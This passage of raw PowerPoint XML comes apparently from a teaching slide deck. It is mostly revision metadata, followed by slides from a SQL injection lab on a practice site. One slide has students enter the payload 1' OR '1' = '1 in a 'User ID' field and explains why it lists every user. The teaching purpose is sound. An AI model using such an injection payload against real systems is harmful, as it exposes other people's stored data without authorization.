        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:57:30.238" v="1378" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:spMk id="3" creationId="{4BDDE3EC-F076-499C-96A3-50D98C09FDD7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:54:37.260" v="935" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:picMk id="4" creationId="{BC2D14DB-1018-4381-983D-92B208330E14}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:10.693" v="1393" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:picMk id="5" creationId="{66ED8C75-897B-4F94-B900-397915539256}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:20:24.098" v="1731" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1667904667" sldId="608"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:00:51.387" v="1482" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:spMk id="2" creationId="{EE768D41-C2A8-4E8A-B668-09BC353AE480}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:18:57.971" v="1670" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:spMk id="3" creationId="{E677FC43-A4B1-4E42-8E0C-A80703E5CB7D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:19:58.957" v="1715"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:spMk id="5" creationId="{D756E920-8DA3-4A91-9599-F6EB39F274AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:19:33.642" v="1698" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:spMk id="6" creationId="{A8C6BB78-433C-4764-8EEC-1A3905B5DD06}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:20:10.059" v="1727" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:spMk id="11" creationId="{473EA408-4203-4C44-A10B-05E72778CEC6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:01:11.187" v="1492" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:picMk id="4" creationId="{A54C9E6E-EB81-4E81-B119-681A430822A3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:20:24.098" v="1731" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:cxnSpMk id="8" creationId="{6E8A9B3A-0A6E-4C38-B65D-72B2BA88FA75}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:19:57.429" v="1713" actId="692"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:cxnSpMk id="10" creationId="{EF8253AD-BD80-4839-9AD8-4D46AEE7F48F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:20:15.458" v="1730" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1667904667" sldId="608"/>
            <ac:cxnSpMk id="12" creationId="{F36B8C77-3407-46AB-AE17-987B06A1FF71}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T19:58:17.408" v="1394" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2519246022" sldId="608"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T14:10:40.401" v="2338" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1376180270" sldId="609"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:20:38.307" v="1745" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1376180270" sldId="609"/>
            <ac:spMk id="2" creationId="{9EAD2106-FE52-4291-BA1E-26A0AACD5E37}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T14:10:40.401" v="2338" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1376180270" sldId="609"/>
            <ac:spMk id="3" creationId="{5DEAD0E6-1918-43FF-9E28-CCD68F119787}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T14:09:56.900" v="2278" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1376180270" sldId="609"/>
            <ac:picMk id="4" creationId="{ECC99673-52D8-485A-9458-430952743D7C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T14:43:40.411" v="3012" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2269361501" sldId="610"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-19T20:36:42.457" v="2006" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269361501" sldId="610"/>
            <ac:spMk id="2" creationId="{72D2E157-EE2C-4A3E-BEEA-B8CF9EC3401F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T14:43:40.411" v="3012" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269361501" sldId="610"/>
            <ac:spMk id="3" creationId="{C2821631-6A21-443D-A6D9-C93BD9C3C198}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T14:43:28.412" v="3011" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2269361501" sldId="610"/>
            <ac:picMk id="4" creationId="{7EBACBC4-DCE1-453E-B92D-67BA88867545}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:34:53.653" v="4793" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2881646623" sldId="611"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T14:44:07.227" v="3026" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2881646623" sldId="611"/>
            <ac:spMk id="2" creationId="{5D2ACE0C-64F6-476A-BAA3-6B928E1D804D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:34:49.294" v="4791" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2881646623" sldId="611"/>
            <ac:spMk id="3" creationId="{3F11D95D-18C7-4EF3-B91F-1AB77A007EA5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:34:53.653" v="4793" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2881646623" sldId="611"/>
            <ac:picMk id="4" creationId="{47330BFA-C9D2-4F93-B105-D306789D83D7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:15:58.711" v="3731" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3071447192" sldId="612"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:04:36.633" v="3041" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071447192" sldId="612"/>
            <ac:spMk id="2" creationId="{C60CB1AA-385D-4177-B37F-6408AD9C3396}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:09:27.392" v="3417" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071447192" sldId="612"/>
            <ac:spMk id="3" creationId="{CA63D5CD-9319-41E6-BA6C-E214DAB0FFDE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:15:58.711" v="3731" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071447192" sldId="612"/>
            <ac:spMk id="5" creationId="{C7E2CF03-68C8-4B97-8BE8-D8012174B151}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:07:55.026" v="3317" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071447192" sldId="612"/>
            <ac:picMk id="4" creationId="{6D9D1FFB-C6A3-4D39-BDEC-A0DE59E04DF4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:15:54.914" v="3730" actId="692"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3071447192" sldId="612"/>
            <ac:cxnSpMk id="7" creationId="{C1F45CE2-30F5-4518-BAD5-8653A3D56827}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:18:41.064" v="3902" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="638423102" sldId="613"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:09:33.744" v="3431" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="638423102" sldId="613"/>
            <ac:spMk id="2" creationId="{912299C5-E139-4BF3-BAE9-5F6FEFDA3B3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:18:41.064" v="3902" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="638423102" sldId="613"/>
            <ac:spMk id="3" creationId="{2BB3F4AD-B9EA-4E0A-9C1C-E22B576AB0DD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:21:33.982" v="4086" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3622088355" sldId="614"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:19:41.543" v="3916" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3622088355" sldId="614"/>
            <ac:spMk id="2" creationId="{30D5078B-7A49-4CA8-9411-6B8AE3148387}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:20:59.110" v="4013" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3622088355" sldId="614"/>
            <ac:spMk id="3" creationId="{047E5107-16CF-4763-A0AB-5B6B90C7F8A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:21:22.471" v="4083" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3622088355" sldId="614"/>
            <ac:spMk id="5" creationId="{D3FC9227-E0EA-4BEB-9B28-9426BE4E8A1F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:20:51.737" v="4012" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3622088355" sldId="614"/>
            <ac:picMk id="4" creationId="{92EB01D2-7ECB-45EB-87E4-C77967606AF0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:21:33.982" v="4086" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3622088355" sldId="614"/>
            <ac:cxnSpMk id="6" creationId="{34CF19A9-2ED9-4A70-833B-852D97F11ABD}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:31:56.870" v="4582" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4062376826" sldId="615"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:21:43.095" v="4100" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062376826" sldId="615"/>
            <ac:spMk id="2" creationId="{CEA1E034-6995-4CE8-81C9-E1FEAAAFE337}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:30:57.513" v="4491" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062376826" sldId="615"/>
            <ac:spMk id="3" creationId="{821BC5BD-E2E6-4121-AB8D-B83154140DD6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:31:56.870" v="4582" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062376826" sldId="615"/>
            <ac:spMk id="5" creationId="{38CCC945-4F1F-4D34-9958-2A5C12D3DF77}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:30:25.575" v="4392" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062376826" sldId="615"/>
            <ac:picMk id="4" creationId="{C2ECDC55-431C-489D-8F35-5152B7BE8314}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D6470162-2533-4985-8B45-B16FF58F298A}" dt="2020-03-20T15:31:50.598" v="4543" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4062376826" sldId="615"/>
            <ac:cxnSpMk id="6" creationId="{107346F7-7602-4FFD-AE7A-762F9AE1BA6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8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0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2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2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7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851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8" y="4737655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20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4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A0F91-F08B-4E38-9090-340ABDAD55C5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SQL Injection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2106-FE52-4291-BA1E-26A0AACD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D0E6-1918-43FF-9E28-CCD68F11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786630" cy="39060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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the ‘User ID:’ section, search for 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User ID: 4 should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Pablo Picasso</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search for User ID: 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User ID: 1 should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notice that the website is supposed to display the info like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ID, First Name, and then Surname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if we want to be malicious?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99673-52D8-485A-9458-43095274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92" y="1027908"/>
            <a:ext cx="3692608" cy="20799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18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E157-EE2C-4A3E-BEEA-B8CF9EC3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1631-6A21-443D-A6D9-C93BD9C3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48120"/>
            <a:ext cx="7123431" cy="407356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Instead of entering just the user id, tack on another SQL command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>Search for:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1' OR '1' = '1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0">
              <a:latin typeface="Tw Cen MT"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>You should notice all of the users listed, why is that?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>Instead of searching for an ID number, you are now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2025" dirty="0"/>
              <a:t>  comparing each user ID to the statement ‘1 OR 1 = 1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user1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dirty="0"/>
              <a:t>would check that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1 = 1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dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty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 dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR 1 = 1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dirty="0"/>
              <a:t>(Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty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 dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user2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dirty="0"/>
              <a:t>would check that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2 = 1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dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0"/>
              <a:t>)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b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OR 1 = 1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dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty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 dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>user3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dirty="0"/>
              <a:t>would check that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>3 = 1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dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False</a:t>
            </a:r>
            <a:r>
